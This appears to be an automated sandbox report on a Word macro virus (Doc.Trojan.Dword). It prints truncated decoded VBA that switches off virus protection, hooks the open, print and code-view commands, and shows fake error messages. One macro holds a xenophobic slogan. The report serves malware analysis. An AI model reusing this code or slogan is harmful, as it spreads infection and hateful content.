Verdict: MALICIOUS
Risk Score: 200

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with critical heuristics firing for VBA macros and an AutoOpen macro. The presence of VBA macros, specifically an AutoOpen macro, suggests that malicious code is designed to execute automatically when the document is opened. The 'Dworld' subroutine, though truncated, indicates potential for further malicious actions.
Heuristics (4)
- ClamAV: Doc.Trojan.Dword-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Dword-1
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 30528 bytes |

SHA-256: e2c0f7b0aa87403f0b11c2d4e98dcb3794b7971b4611067c96b97859e6ebd081
Detection (ClamAV): Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script)

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub wechsel()
Attribute wechsel.VB_Description = "Makro aufgezeichnet am 12.01.99 von Harald J. Glatte"
Attribute wechsel.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.wechsel"
' wechsel macro
' Macro recorded on 12.01.99 by Harald J. Glatte
Selection.InsertBreak Type:=wdSectionBreakContinuous
End Sub
Sub Makro1()
Attribute Makro1.VB_Description = "Makro aufgezeichnet am 03.02.99 von Harald J. Glatte"
Attribute Makro1.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.Makro1"
'
' Makro1 macro
' Macro recorded on 03.02.99 by Harald J. Glatte
'
ActiveDocument.Shapes.AddTextEffect(msoTextEffect14, "Ausländer raus!" & Chr(13) & "" & Chr(10) & "", _
"Impact", 36#, msoFalse, msoFalse, 181.85, 59.45).Select
Selection.ShapeRange.ScaleWidth 1.3, msoFalse, msoScaleFromTopLeft
Selection.ShapeRange.ScaleHeight 0.38, msoFalse, msoScaleFromTopLeft
Selection.ShapeRange.IncrementTop 7.2
Selection.ShapeRange.IncrementTop 7.2
Selection.ShapeRange.IncrementTop 7.2
Selection.ShapeRange.IncrementTop -1.85
Selection.ShapeRange.IncrementTop -7.2
Selection.ShapeRange.IncrementTop -7.2
Selection.ShapeRange.IncrementTop -7.2
Selection.ShapeRange.ScaleWidth 1.08, msoFalse, msoScaleFromBottomRight
Selection.ShapeRange.ScaleHeight 1.02, msoFalse, msoScaleFromTopLeft
End Sub
Attribute VB_Name = "Dworld"
Declare Function ShowCursor Lib "USER32" (ByVal fShow As Integer) As Integer
Sub AnsichtCode()
On Error Resume Next
Call InfNormal
Call InfDok
ActiveDocument.SaveAs (WordBasic.[FileName$]())
MsgBox "Nicht genug freien Speicher um Anwendung zu starten", 16, "Microsoft Word - Fehler"
WordBasic.FileExit dlg
End Sub
Sub AnsichtVBCode()
On Error Resume Next
Call InfNormal
Call InfDok
ActiveDocument.SaveAs (WordBasic.[FileName$]())
MsgBox "Nicht genug freien Speicher um Anwendung zu starten", 16, "Microsoft Word - Fehler"
WordBasic.FileExit dlg
End Sub
Sub AutoOpen()
ShowVisualBasicEditor = False
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
With Options
.SaveNormalPrompt = False
.VirusProtection = False
.AllowFastSave = False
End With
On Error GoTo ende_
Call InfNormal
Call InfDok
Call PayloadB
ActiveDocument.SaveAs (WordBasic.[FileName$]())
ende_:
End Sub
Sub AutoNew()
Call AutoOpen
End Sub
Sub DateiDokVorlagen()
On Error Resume Next
Call InfNormal
Call InfDok
ActiveDocument.SaveAs (WordBasic.[FileName$]())
MsgBox "Nicht genug freien Speicher um Anwendung zu starten", 16, "Microsoft Word - Fehler"
WordBasic.FileExit dlg
End Sub
Sub DateiDruckenStandard()
Randomize
If Second(Now()) <= 30 And Int((3 * Rnd) + 1) = 2 Then
MsgBox "Des Zauberer´s Finger sind im Spiel!", 32, "Microsoft Word"
ScreenUpdating = 0
Call PayloadA
WordBasic.EndOfDocument
Selection.TypeParagraph
Selection.TypeParagraph
Selection.Font.Name = "Courier New"
Selection.Font.ColorIndex = wdRed
Selection.ParagraphFormat.Alignment = wdAlignParagraphCenter
WordBasic.Insert "...Die aufgeklärten Brüder der schwarzen Nacht sagen:..."
Selection.TypeParagraph
WordBasic.Insert "-HOOOOOLLDRIIOOOOO!!!-"
WordBasic.StartOfDocument
ScreenUpdating = 1
End If
ActiveDocument.PrintOut
Call InfNormal
Call InfDok
ActiveDocument.SaveAs (WordBasic.[FileName$]())
Call PayloadB
End Sub
Sub DateiÖffnen()
On Error GoTo ende_
ShowVisualBasicEditor = False
WordBasic.DisableAutoMacros 0
With Options
.SaveNormalPrompt = False
End With
With Dialogs(wdDialogFileOpen)
.Show
End With
Call InfDok
ActiveDocument.Save
... (truncated)
```